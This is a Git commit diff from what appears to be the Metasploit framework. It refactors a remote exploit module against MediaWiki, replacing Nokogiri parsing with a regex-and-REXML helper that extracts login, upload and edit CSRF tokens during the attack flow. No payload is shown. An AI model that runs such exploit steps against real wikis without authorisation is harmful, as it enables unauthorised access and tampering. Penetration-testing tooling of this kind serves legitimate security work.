I had a problem, then I used regex.
Meatballs
parent
57f4998568
commit
67c18d8d2d
|
|
@ -75,12 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Mediawiki will give a 404 for unknown pages but still have a body
|
||||
if response.code == 200 || response.code == 404
|
||||
vprint_status("#{response.code} response received...")
|
||||
response_html = Nokogiri::HTML(response.body)
|
||||
meta_gen_nodes = response_html.xpath("//meta[@name='generator']")
|
||||
meta_generator = get_html_value(response.body, 'meta', 'generator', 'content')
|
||||
|
||||
if meta_gen_nodes.first && meta_gen_nodes.first['content']
|
||||
meta_generator = meta_gen_nodes.first['content']
|
||||
else
|
||||
unless meta_generator
|
||||
vprint_status("No META Generator tag on #{full_uri}.")
|
||||
return CheckCode::Unknown
|
||||
end
|
||||
|
|
@ -137,8 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
session_cookie = response.get_cookies
|
||||
|
||||
response_html = Nokogiri::HTML(response.body)
|
||||
wp_login_token = get_token_value(response_html, 'wpLoginToken')
|
||||
wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')
|
||||
|
||||
unless wp_login_token
|
||||
fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?")
|
||||
|
|
@ -182,10 +178,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::NotFound, "Failed to access file upload page.")
|
||||
end
|
||||
|
||||
upload_file_html = Nokogiri::HTML(upload_file.body)
|
||||
wp_edit_token = get_token_value(upload_file_html, 'wpEditToken')
|
||||
wp_upload = get_token_value(upload_file_html, 'wpUpload')
|
||||
title = get_token_value(upload_file_html, 'title')
|
||||
wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value')
|
||||
wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')
|
||||
title = get_html_value(upload_file.body, 'input', 'title', 'value')
|
||||
|
||||
unless wp_edit_token
|
||||
fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?")
|
||||
|
|
@ -246,15 +241,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::NotFound, "Failed to open target edit page: #{random_page}.")
|
||||
end
|
||||
|
||||
random_html = Nokogiri::HTML(random_edit.body)
|
||||
|
||||
wp_auto_summary = get_token_value(random_html, 'wpAutoSummary')
|
||||
wp_edit_token = get_token_value(random_html, 'wpEditToken')
|
||||
wp_start_time = get_token_value(random_html, 'wpStarttime')
|
||||
wp_edit_time = get_token_value(random_html, 'wpEdittime')
|
||||
old_id = get_token_value(random_html, 'oldid')
|
||||
wp_scroll_top = get_token_value(random_html, 'wpScrolltop')
|
||||
wp_section = get_token_value(random_html, 'wpSection')
|
||||
wp_auto_summary = get_html_value(random_edit.body, 'input', 'wpAutoSummary', 'value')
|
||||
wp_edit_token = get_html_value(random_edit.body, 'input', 'wpEditToken', 'value')
|
||||
wp_start_time = get_html_value(random_edit.body, 'input', 'wpStarttime', 'value')
|
||||
wp_edit_time = get_html_value(random_edit.body, 'input', 'wpEdittime', 'value')
|
||||
old_id = get_html_value(random_edit.body, 'input', 'oldid', 'value')
|
||||
wp_scroll_top = get_html_value(random_edit.body, 'input', 'wpScrolltop', 'value')
|
||||
wp_section = get_html_value(random_edit.body, 'input', 'wpSection', 'value')
|
||||
|
||||
if wp_edit_token
|
||||
print_good("Retrieved edit CSRF token.")
|
||||
|
|
@ -292,12 +285,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
def get_token_value(document, value_name)
|
||||
return nil unless document
|
||||
return nil unless value_name
|
||||
node = document.xpath("//input[@name='#{value_name}']")
|
||||
return nil unless node
|
||||
node.first['value']
|
||||
# The order of name, value keeps shifting so regex is painful.
|
||||
# Cant use nokogiri due to security issues
|
||||
# Cant use REXML directly as its not strict XHTML
|
||||
# So we do a filthy mixture of regex and REXML
|
||||
def get_html_value(html, type, name, value)
|
||||
return nil unless html
|
||||
return nil unless type
|
||||
return nil unless name
|
||||
return nil unless value
|
||||
|
||||
found = nil
|
||||
html.each_line do |line|
|
||||
if line =~ /(<#{type}[^\/]*name="#{name}".*?\/>)/i
|
||||
found = $&
|
||||
break
|
||||
end
|
||||
end
|
||||
|
||||
if found
|
||||
doc = REXML::Document.new found
|
||||
return doc.root.attributes[value]
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue